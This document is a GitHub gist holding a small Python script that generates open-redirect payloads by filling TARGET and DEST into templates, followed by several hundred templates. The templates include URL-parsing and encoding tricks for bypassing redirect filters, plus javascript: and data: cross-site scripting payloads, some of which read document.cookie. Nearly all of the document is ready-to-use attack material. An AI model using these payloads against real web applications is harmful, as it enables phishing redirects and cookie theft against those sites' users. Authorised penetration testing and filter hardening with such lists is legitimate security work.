Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Open url redirect payload generator
import re
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--target", "-t", action="store", help="Enter the target address", required=True)
parser.add_argument("--dest", "-d", action="store", help="Enter the address where you want to redirect to",
required=True)
parser.add_argument("--output", "-o", action="store", help="Enter output file name")
args = parser.parse_args()
payloads = []
# Remove protocol from url
junk = re.compile(r"https?://")
target = junk.sub("", args.target)
dest = junk.sub("", args.dest)
with open("payloads.txt", "r") as handle:
templates = handle.readlines()
for payload in templates:
payload = payload.rstrip()
payload = re.sub("TARGET", target, payload)
payload = re.sub("DEST", dest, payload)
print(payload)
payloads.append(payload)
if args.output:
with open(args.output, "w")as handle:
[handle.write(f"{x.rstrip()}\n") for x in payloads]
//DEST/%2f..
//TARGET@DEST/%2f..
///DEST/%2f..
///TARGET@DEST/%2f..
////DEST/%2f..
////TARGET@DEST/%2f..
https://DEST/%2f..
https://TARGET@DEST/%2f..
/https://DEST/%2f..
/https://TARGET@DEST/%2f..
//DEST/%2f%2e%2e
//TARGET@DEST/%2f%2e%2e
///DEST/%2f%2e%2e
///TARGET@DEST/%2f%2e%2e
////DEST/%2f%2e%2e
////TARGET@DEST/%2f%2e%2e
https://DEST/%2f%2e%2e
https://TARGET@DEST/%2f%2e%2e
/https://DEST/%2f%2e%2e
/https://TARGET@DEST/%2f%2e%2e
//DEST/
//TARGET@DEST/
///DEST/
///TARGET@DEST/
////DEST/
////TARGET@DEST/
https://DEST/
https://TARGET@DEST/
/https://DEST/
/https://TARGET@DEST/
//DEST//
//TARGET@DEST//
///DEST//
///TARGET@DEST//
////DEST//
////TARGET@DEST//
https://DEST//
https://TARGET@DEST//
//https://DEST//
//https://TARGET@DEST//
//DEST/%2e%2e%2f
//TARGET@DEST/%2e%2e%2f
///DEST/%2e%2e%2f
///TARGET@DEST/%2e%2e%2f
////DEST/%2e%2e%2f
////TARGET@DEST/%2e%2e%2f
https://DEST/%2e%2e%2f
https://TARGET@DEST/%2e%2e%2f
//https://DEST/%2e%2e%2f
//https://TARGET@DEST/%2e%2e%2f
///DEST/%2e%2e
///TARGET@DEST/%2e%2e
////DEST/%2e%2e
////TARGET@DEST/%2e%2e
https:///DEST/%2e%2e
https:///TARGET@DEST/%2e%2e
//https:///DEST/%2e%2e
//TARGET@https:///DEST/%2e%2e
/https://DEST/%2e%2e
/https://TARGET@DEST/%2e%2e
///DEST/%2f%2e%2e
///TARGET@DEST/%2f%2e%2e
////DEST/%2f%2e%2e
////TARGET@DEST/%2f%2e%2e
https:///DEST/%2f%2e%2e
https:///TARGET@DEST/%2f%2e%2e
/https://DEST/%2f%2e%2e
/https://TARGET@DEST/%2f%2e%2e
/https:///DEST/%2f%2e%2e
/https:///TARGET@DEST/%2f%2e%2e
/%09/DEST
/%09/TARGET@DEST
//%09/DEST
//%09/TARGET@DEST
///%09/DEST
///%09/TARGET@DEST
////%09/DEST
////%09/TARGET@DEST
https://%09/DEST
https://%09/TARGET@DEST
/%5cDEST
/%5cTARGET@DEST
//%5cDEST
//%5cTARGET@DEST
///%5cDEST
///%5cTARGET@DEST
////%5cDEST
////%5cTARGET@DEST
https://%5cDEST
https://%5cTARGET@DEST
/https://%5cDEST
/https://%5cTARGET@DEST
https://DEST
https://TARGET@DEST
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
javascript:%0aalert`1`
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//DEST
http:DEST
https:DEST
//localdomain%E3%80%82pw
\/\/DEST/
/\/DEST/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
//\/DEST/
//localdomain%00.pw
https://TARGET/https://DEST/
";alert(0);//
javascript://TARGET?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://TARGET@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://TARGET@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://TARGET@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://TARGET@472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://TARGET@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.00000316
http://TARGET@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://[::216.58.214.206]
http://TARGET@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://TARGET@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://TARGET@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://TARGET@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://TARGET@00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://TARGET@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:TARGET@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:TARGET@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:TARGET@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:TARGET@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:TARGET@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:TARGET@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:TARGET@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:TARGET@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:TARGET@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:TARGET@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:TARGET@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:TARGET@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
〱DEST
〵DEST
ゝDEST
ーDEST
ーDEST
/〱DEST
/〵DEST
/ゝDEST
/ーDEST
/ーDEST
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
<>javascript:alert(1);
<>//DEST
//DEST\@TARGET
https://:@DEST\@TARGET
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://DEST:80#@TARGET/
http://DEST:80?@TARGET/
http://3H6k7lIAiqjfNeN@TARGET+@DEST/
http://3H6k7lIAiqjfNeN@TARGET⁺@DEST/
http://XY>.7d8T\205pZM@TARGET+@DEST/
http://XY>.7d8T\205pZM@TARGET⁺@DEST/
http://3H6k7lIAiqjfNeN@TARGET@DEST/
http://XY>.7d8T\205pZM@TARGET@DEST/
http://TARGET+&@DEST#+@TARGET/
http://TARGET⁺&@DEST#⁺@TARGET/
http://DEST\tTARGET/
//DEST:80#@TARGET/
//DEST:80?@TARGET/
//3H6k7lIAiqjfNeN@TARGET+@DEST/
//3H6k7lIAiqjfNeN@TARGET⁺@DEST/
//XY>.7d8T\205pZM@TARGET+@DEST/
//XY>.7d8T\205pZM@TARGET⁺@DEST/
//3H6k7lIAiqjfNeN@TARGET@DEST/
//XY>.7d8T\205pZM@TARGET@DEST/
//TARGET+&@DEST#+@TARGET/
//TARGET⁺&@DEST#⁺@TARGET/
//DEST\tTARGET/
//;@DEST
//﹔@DEST
http://;@DEST
http://﹔@DEST
@DEST
javascript://https://TARGET/?z=%0Aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
http://DEST%2f%2f.TARGET/
http://DEST%5c%5c.TARGET/
http://DEST%3F.TARGET/
http://DEST%23.TARGET/
http://TARGET:80%40DEST/
http://TARGET%2eDEST/
/x:1/:///%01javascript:alert(document.cookie)/
/https:/%5cDEST/
https:/%5cDEST/
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascripT://TARGET/%250d%250aalert(document.cookie)
/http://DEST
/%2f%2fDEST
//%2f%2fDEST
/DEST/%2f%2e%2e
/http:/DEST
http:/DEST
/.DEST
http://.DEST
.DEST
///\;@DEST
///\﹔@DEST
///DEST
/////DEST/
/////DEST
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
javascript&#x3A;alert()
javascript:alert&lpar;&rpar;
javascript:al&#x65;rt``
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074``
java%0ascript:alert(1)
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)
java%09script:alert(1)
java%0dscript:alert(1)
javascript://%0aalert(1)
javascript://%0aalert`1`
Javas%26%2399;ript:alert(1)
data:TARGET;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
jaVAscript://TARGET//%0d%0aalert(1);//
http://www.DEST\.TARGET
%19Jav%09asc%09ript:https%20://TARGET/%250Aconfirm%25281%2529
%01https://DEST
TARGET;@DEST
TARGET﹔@DEST
https://TARGET;@DEST
https://TARGET﹔@DEST
http:%0a%0dDEST
https://%0a%0dDEST
DEST/TARGET
https://DEST/TARGET
//DEST/TARGET
javascript:alert(document.domain)//://
/#//DEST
#//DEST
https%3A/DEST
https%3A/;@DEST
https%3A/﹔@DEST
javascript:%250Aalert(1)
javascript:alert(1)//https://TARGET
°/DEST
////DEST
//DEST?
//.@.@DEST
javascript:new%20Function`al\ert\`1\``;
%09Jav%09ascript:alert(1)
https://DEST\ᵗTARGET
//DEST\ᵗTARGET
https://TARGET。₨/
//TARGET。₨/
https://DEST\udfff@TARGET/
//DEST\udfff@TARGET/
https://DEST�@TARGET/
//DEST�@TARGET/
https://TARGET%40%E2%80%AE@wp.niamodlacol
https://TARGET%40%E2%80%AE@DEST
https://TARGET@%E2%80%AE@wp.niamodlacol
https://TARGET@%E2%80%AE@DEST
https://TARGET@/%E2%80%AE@wp.niamodlacol
https://TARGET@/%E2%80%AE@DEST
https://TARGET@'#DEST
javascript:alert(1)//DEST/
javascript:alert(1)//TARGET/
Javascript://%E2%80%A9alert(618)
https://TARGET%09.DEST
TARGET%09.DEST
https://TARGET%252eDEST
TARGET%252eDEST
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment